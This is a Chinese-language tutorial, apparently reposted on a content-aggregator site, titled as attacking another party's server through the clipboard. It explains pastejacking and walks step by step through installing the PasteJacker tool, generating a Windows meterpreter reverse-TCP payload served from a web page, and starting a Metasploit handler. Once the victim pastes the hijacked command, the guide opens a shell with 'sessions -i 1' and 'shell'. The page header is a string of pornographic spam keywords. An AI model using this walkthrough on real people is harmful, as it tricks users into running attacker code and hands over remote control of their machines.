日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

kali linux 通过粘贴板攻击对方服务器

發布時間:2024/1/8 linux 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 kali linux 通过粘贴板攻击对方服务器 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

一、粘貼板中毒攻擊原理

二、Pastejacker 攻擊工具簡介

三、安裝Pastejacker

四、Pastejacker結合MSF拿到目標shell權限


一、粘貼板中毒攻擊原理

該工具的主要目的是自動化攻擊,將此攻擊中使用的所有已知技巧收集在一個地方和一項自動化工作,因為在搜索后發現沒有工具可以正確地完成這項工作方式現在因為這種攻擊取決于用戶將粘貼什么,將 Metasploit 網絡交付模塊的想法實現到工具中,所以當用戶粘貼到終端時,你會在他的設備上獲得 meterpreter 會話。

換句話說,當我們在自己電腦上的一個網站上復制一條看似正常的命令時,但事實上那個網站在背后偷偷的篡改了我們粘貼的內容,我以為我復制了一條正常的命令,但事實上我復制到粘貼板上的命令,卻是一串惡意代碼,這就是惡意的網站搭建者,他欺騙我們最終用戶訪問他的惡意網站,然后通過我們在他網站上的鍵盤和鼠標操作,將惡意的內容注入到我們本地的剪貼板當中,這種攻擊方式,我們就成為粘貼劫持攻擊。

二、Pastejacker 攻擊工具簡介

模擬剪貼板劫持對目標進行攻擊。

https://github.com/D4Vinci/PasteJacker

簡而言之,粘貼劫持是惡意網站用來控制您計算機的剪貼板并在您不知情的情況下將其內容更改為有害內容的一種方法。

所以在這里所做的是自動化原始攻擊并添加另外兩個技巧來欺騙用戶,使用 HTML 和 CSS將討論它然后添加 meterpreter 會話

三、安裝Pastejacker

安裝 Pastejacker 工具

git clone https://github.com/D4Vinci/PasteJacker.git

注意Kali Linux 默認安裝了 Python 2.x 和 Python 3.x 版本,可以按照以下步驟在 Kali 中切換到 Python 3:

sudo update-alternatives --install /usr/bin/python python /usr/bin/python2*
sudo update-alternatives --install /usr/bin/python python /usr/bin/python3*
這將把 /usr/bin/python 鏈接到 Python 2.7 和 Python 3 之間進行切換。您可以使用以下命令來切換到 Python 3:

sudo update-alternatives --config python

?

安裝pip

wget https://bootstrap.pypa.io/get-pip.py python3 get-pip.py

安裝PasteJacker

python3 -m pip install ./PasteJacker

四、Pastejacker結合MSF拿到目標shell權限

進入Pastejacker安裝路徑:

cd /usr/local/lib/python3.9/dist-packages/PasteJacker/Core

?

vim updater.py

?

按i進入編輯模式把選中的內容按D刪除。按ESC-- :wq保存退出

運行工具 :pastejacker

?

選擇:1(Windows)

選擇:1

選擇:1-- TCP協議的后滲透模塊

然后輸入本地IP

?端口自己設定或者默認回車就可以了?

?選擇:2;服務端口默認80回車

輸入一些文字內容訪問攻擊者IP時候會出現瀏覽器頁面上

?這時候服務已開啟……

新建一個終端進入pastejacker文件夾

cd .pastejacker/

?利用MSF啟動pastejacker 設置好的文件包(msf_handler.rc),該文件是在 pastejacker 程序設置而保存下來的操作,直接使用該文件即可,不需要去手動設置

msfconsole -r msf_handler.rc

?到Windows受害者端訪問kali攻擊者的IP地址

復制內容粘貼到cmd命令窗口

?查看目標列表

sessions

選中列表中的第一個,如果有多個粘貼運行了剪貼板可在列表中選其中一個進行后滲透?

sessions -i 1

?

shell //獲取shell chcp 65001 //解決亂碼

?

總結

以上是生活随笔為你收集整理的kali linux 通过粘贴板攻击对方服务器的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。